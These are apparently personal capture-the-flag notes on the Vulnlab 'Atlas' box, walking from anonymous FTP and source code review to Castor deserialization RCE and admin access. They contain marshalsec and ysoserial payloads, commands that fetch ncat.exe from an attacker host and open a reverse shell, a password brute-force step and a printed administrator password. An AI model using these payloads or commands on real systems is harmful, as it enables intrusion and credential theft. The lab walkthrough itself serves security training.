Here is my notes on ATLAS box from Vulnlab which deployed to Hackthebox.
ATLAS: 10.10.118.2
PORT STATE SERVICE VERSION
21/tcp open ftp?
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 22851463 Jul 03 2023 atlas-pilot-1.0.0-SNAPSHOT.jar #jd-gui
|_-r--r--r-- 1 ftp ftp 586379 Jul 03 2023 atlas_generator.zip
| ssl-cert: Subject: commonName=filezilla-server self signed certificate
| Not valid before: 2023-06-30T15:35:45
|_Not valid after: 2024-06-30T15:40:45
|_ssl-date: TLS randomness does not represent time
#Nothing Interesting and exploits in pom.xml from atlas_generator.zip
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 4bf3652272c43ad27daf8fb1359679ae (RSA)
| 256 dfd563880957cd4e7b905b4646034213 (ECDSA)
|_ 256 a974d9783fbd7c398ca62aa1fb1236ba (ED25519)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ATLAS
| Not valid before: 2024-11-24T01:01:59
|_Not valid after: 2025-05-26T01:01:59
|_ssl-date: 2024-11-25T01:21:34+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: ATLAS
| NetBIOS_Domain_Name: ATLAS
| NetBIOS_Computer_Name: ATLAS
| DNS_Domain_Name: ATLAS
| DNS_Computer_Name: ATLAS
| Product_Version: 10.0.19041
|_ System_Time: 2024-11-25T01:20:33+00:00
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-GB
| Date: Mon, 25 Nov 2024 01:28:45 GMT
| Connection: close
| <html>
| <head>
| <style>
| body {
| background-image: url(./59f86e9a43e6f89908a4f0b948915bef.png);
| background-repeat: no-repeat;
| background-position-x: right;
| background-position-y: bottom;
| background-size: 50%;
| display: block;
#It's not vulnerable to XXE exploit due to the current updates of castor library which is version 1.4.1.
#It's from pom.xml
XML with employee data:
Profile
Skills
Technical
Education
#NOPE, not vulnerable to XXE.
Source Code Review:
Java:
pom.xml
Read the script that are revelant to the main important part of the website.
If the scripts upon scripts upon other scripts then read them until you found a vulnerability codes part of the script.
If not then move on to the different part of source code or think outside the box.
FileUploadController.java: #From Atlas_Generator.zip
[SNIP]
@GetMapping("/generateTemplate")
public String writeMarshall(Model model) throws IOException {
model.addAttribute("message", Client.createXML());
return "xmlTemplate";
}
[SNIP]
/generateTemplate is generate a sample template file and place it on FTP service.
We are going to use this for our exploit.
So /generateTemplate is upon to Client.java script.
Client.java:
import org.exolab.castor.xml.Unmarshaller;
import org.exolab.castor.xml.Marshaller;
import org.exolab.castor.mapping.Mapping;
import org.exolab.castor.mapping.MappingException;
public class Client {
public static String createXML()throws IOException{
try {
FileWriter fileWriter = new FileWriter("employee_template.xml");
Marshaller marshaller = new Marshaller(fileWriter);
// Mapping
Mapping mapping = new Mapping();
mapping.loadMapping("http://127.0.0.1:8080/mapping.xml");
marshaller.setMapping(mapping);
Employee employee=new Employee();
employee.setId(101);
employee.setName("Jonathan Doe");
employee.setTitle("ROCKET TESTER, PILOT");
employee.setEmail("jonathan@starfield.com");
employee.setPhone("(313) - 867-5309");
[SNIP]
So It using Unmarshaller and Marshaller to generate and accept xml file.
It's vulnerable to Java Unmarshaller exploit:
https://github.com/mbechler/marshalsec
mvn clean package -DskipTests
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor ldap://10.8.0.71:1389/a
This will gave us a payload:
<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://10.8.0.71:1389/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://10.8.0.71:1389/a</shareable-resource></bean-factory></x>
Then start a ldap listener out of it:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.0.71:8888/#Exploit"
Now add that payload to employee_template.xml:
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/FTP]
└─# cat employee_template.xml
<?xml version="1.0" encoding="UTF-8"?>
<Employee id="101"><name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://10.8.0.71:1389/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://10.8.0.71:1389/a</shareable-resource></bean-factory></name><talent-titles>Navigation</talent-titles><talent-titles>Warp Engine</talent-titles><talent-titles>Project Direction</talent-titles><talent-textes>Assertively exploit wireless initiatives rather than synergistic core competencies.</talent-textes><talent-textes>Credibly streamline mission-critical value with multifunctional functionalities.</talent-textes><talent-textes>Proven ability to lead and manage a wide variety of design and development projects in team and independent situations.</talent-textes><skills>Mining</skills><skills>Ship Building</skills><skills>Gravity Science</skills><skills>Alien Communication</skills><skills>Planetology</skills><skills>Zero Trust Tools</skills><skills>Satellite Engineering</skills><skills>Rocket Science</skills><skills>Moon Walks</skills><profile>Progressively evolve cross-platform ideas before impactful infomediaries. Energistically visualize tactical initiatives before cross-media catalysts for change.</profile><phone>(313) - 867-5309</phone><email>jonathan@starfield.com</email><education-text>Dual Major, Robotics and Starships - 4.0 GPA</education-text><education-title>NASA University - Bloomington, Indiana</education-title><title>ROCKET TESTER, PILOT</title></Employee>
-Just rename <x></x> with <name></name> instead.
Upload malicious employee_template file and the exploit should work:
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/marshalsec]
└─# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.8.0.71:8888/#Exploit"
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://10.8.0.71:8888/Exploit.class
#It works !
Convert this SSRF vulnerable to RCE with RMI: #ysoserial
-Require Java 11:
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# sudo update-alternatives --config java
There are 2 choices for the alternative java (providing /usr/bin/java).
Selection Path Priority Status
------------------------------------------------------------
0 /usr/lib/jvm/java-17-openjdk-amd64/bin/java 1711 auto mode
* 1 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111 manual mode
2 /usr/lib/jvm/java-17-openjdk-amd64/bin/java 1711 manual mode
Press <enter> to keep the current choice[*], or type selection number: 1
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 192.168.178.22'
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'wget http://10.8.0.71'
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'wget 10.8.0.71'
* Opening JRMP listener on 1099
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 10.8.0.71'
* Opening JRMP listener on 1099
Then create a payload with marshalsec that point directly to RMI service port:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.8.0.71/a
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.8.0.71/a
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/marshalsec]
└─# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.8.0.71/a
<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.8.0.71/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.8.0.71/a</shareable-resource></bean-factory></x>
<name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.8.0.71/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.8.0.71/a</shareable-resource></bean-factory></name>
Now add that to employee_template.xml like last time:
Malicious employee_template.xml:
<?xml version="1.0" encoding="UTF-8"?>
<Employee id="101"><name xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.8.0.71/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.8.0.71/a</shareable-resource></bean-factory></name><talent-titles>Navigation</talent-titles><talent-titles>Warp Engine</talent-titles><talent-titles>Project Direction</talent-titles><talent-textes>Assertively exploit wireless initiatives rather than synergistic core competencies.</talent-textes><talent-textes>Credibly streamline mission-critical value with multifunctional functionalities.</talent-textes><talent-textes>Proven ability to lead and manage a wide variety of design and development projects in team and independent situations.</talent-textes><skills>Mining</skills><skills>Ship Building</skills><skills>Gravity Science</skills><skills>Alien Communication</skills><skills>Planetology</skills><skills>Zero Trust Tools</skills><skills>Satellite Engineering</skills><skills>Rocket Science</skills><skills>Moon Walks</skills><profile>Progressively evolve cross-platform ideas before impactful infomediaries. Energistically visualize tactical initiatives before cross-media catalysts for change.</profile><phone>(313) - 867-5309</phone><email>jonathan@starfield.com</email><education-text>Dual Major, Robotics and Starships - 4.0 GPA</education-text><education-title>NASA University - Bloomington, Indiana</education-title><title>ROCKET TESTER, PILOT</title></Employee>
Upload it then it will ping back to Kali as long there is a listener port is open by ysoserial:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 10.8.0.71'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50594
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:59:25.574116 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 1, length 40
11:59:25.574473 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 1, length 40
11:59:26.564221 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 2, length 40
11:59:26.564366 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 2, length 40
11:59:27.576485 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 3, length 40
11:59:27.576557 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 3, length 40
11:59:28.608671 IP 10.10.79.140 > 10.8.0.71: ICMP echo request, id 1, seq 4, length 40
11:59:28.608704 IP 10.8.0.71 > 10.10.79.140: ICMP echo reply, id 1, seq 4, length 40
Windows Target: #Example
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'powershell.exe -c "wget http://10.8.0.71/"'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50648
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/FTP]
└─# sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.79.140 - - [26/Nov/2024 12:02:55] "GET / HTTP/1.1" 200 -
#IT WORKS !
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'powershell.exe -c "wget http://10.8.0.71/ncat.exe -O C:\Users\Public\ncat.exe"'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50713
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
^C
┌──(root㉿kali)-[/home/kali/Kali-Tools/ysoserial]
└─# java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'C:\Users\Public\ncat.exe -nv 10.8.0.71 1234 -e CMD'
* Opening JRMP listener on 1099
Have connection from /10.10.79.140:50729
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection
┌──(root㉿kali)-[/home/…/VL/ATLAS/10.10.118.2/FTP]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.79.140] 50730
Microsoft Windows [Version 10.0.19045.3086]
(c) Microsoft Corporation. All rights reserved.
C:\ftp>
C:\ftp>whoami
whoami
atlas\john
C:\ftp>hostname
hostname
ATLAS
USER-SHELL !
https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FAtlas%2FWriteup#Source_Code_Analysis
C:\Users\John\Desktop>whoami
whoami
atlas\john
C:\Users\John\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\John\Desktop
03/07/2023 10:49 <DIR> .
03/07/2023 10:49 <DIR> ..
03/07/2023 10:48 36 user.txt
1 File(s) 36 bytes
2 Dir(s) 5,844,897,792 bytes free
C:\Users\John\Desktop>type user.txt
type user.txt
VL{[REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
C:\Users\John\Downloads\WinSSHTerm>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\John\Downloads\WinSSHTerm
30/06/2023 19:48 <DIR> .
30/06/2023 19:48 <DIR> ..
30/06/2023 19:48 <DIR> config
28/06/2023 13:20 1,745 README.txt
30/06/2023 19:48 <DIR> tools
28/06/2023 13:20 3,115,752 WinSSHTerm.exe
2 File(s) 3,117,497 bytes
4 Dir(s) 5,846,638,592 bytes free
C:\Users\John\Downloads\WinSSHTerm>cd config
cd config
C:\Users\John\Downloads\WinSSHTerm\config>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\John\Downloads\WinSSHTerm\config
30/06/2023 19:48 <DIR> .
30/06/2023 19:48 <DIR> ..
30/06/2023 21:20 676 connections.xml
28/06/2023 16:37 113 key
30/06/2023 21:20 3,620 layout.xml
28/06/2023 16:37 8,952 preferences.xml
4 File(s) 13,361 bytes
2 Dir(s) 5,846,638,592 bytes free
WinSSH Password Crack:
https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FAtlas%2FWriteup#Priv._Esc_-_WinSSHTerm
┌──(root㉿kali)-[/home/kali/VL/ATLAS/10.10.118.2]
└─# python3 bruteforce.py
6%|██████▎ | 3338/59187 [00:12<03:00, 308.88it/s]
Found password: hottie101
Run WinnSSHTerm.exe with the password cracked to see an administrator password.
hottie101
administrator:lzm2wx3Fn7q7gBLDRuf4
administrator@ATLAS C:\Users\Administrator>whoami
atlas\administrator
administrator@ATLAS C:\Users\Administrator>hostname
ATLAS
Administrator SHELL !
administrator@ATLAS C:\Users\Administrator\Desktop>whoami
atlas\administrator
administrator@ATLAS C:\Users\Administrator\Desktop>hostname
ATLAS
administrator@ATLAS C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 5298-6596
Directory of C:\Users\Administrator\Desktop
03/07/2023 10:49 <DIR> .
03/07/2023 10:49 <DIR> ..
03/07/2023 10:47 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 5,846,540,288 bytes free
administrator@ATLAS C:\Users\Administrator\Desktop>type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows